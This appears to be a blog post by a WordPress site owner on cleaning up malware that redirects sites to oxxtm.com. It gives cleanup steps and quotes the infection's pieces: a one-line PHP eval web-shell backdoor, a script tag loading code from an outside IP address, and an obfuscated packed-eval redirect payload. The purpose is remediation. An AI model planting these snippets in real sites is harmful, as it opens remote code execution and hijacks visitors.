So I have been sitting with this silly yet very sticky piece of malware on wordpress sites. It’s an attack whereby arbitrary code can be executed on your wordpress instance to hijack your site to redirect to oxxtm.com.
To save everyone some time here is what I had to do to get rid of it:
Make a backup of your database and files.
Delete all the rubbish files in the wordpress root folder (files and folders with numeric and gibberish names)
Look for any suspicious eval statements in the entire wordpress installation/ codebase. I used PHPStorm’s “find in path” tool. Immediately you will find little eval snippets. Particularly in theme code. They look something like this. If you don’t know how to clear these just get a fresh instance of your theme and replace your theme files.
@ eval ($_POST["dd"]);
Clean up the injected javascript nasties. The culprit behind the redirect is some javascript injected into the wordpress index.php file.
<script type='text/javascript' src='https://5.157.54.13/jquery.js'</script> <script type='text/javascript' src='/wp-includes/js/jquery/jquery.js'</script>
The first script points to some hosted js and then the second script points to your very own jquery that has been injected with even more nasties.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k);return p;}('d("\\1\\7\\4\\e\\0\\1\\3\\g\\0\\b\\f\\2\\7\\0\\4\\3\\6\\c\\l\\m\\n\\9\\6\\2\\2\\k\\h\\5\\5\\1\\1\\1\\3\\0\\a\\a\\2\\8\\3\\b\\0\\8\\9\\i\\j");',24,24,'x6f|x77|x74|x2e|x6e|x2f|x68|x69|x6d|x22|x78|x63|x72|eval|x64|x61|x6c|x3a|x3b|x20|x70|x65|x66|x3d'.split('|'),0,{}));
To fix this, simply replace these files with the original wordpress files. In my case I just copied a fresh wordpress into the site’s root directory and overrode all files.
I hope this helps and if you need any help, just drop me a line @cmptrwizard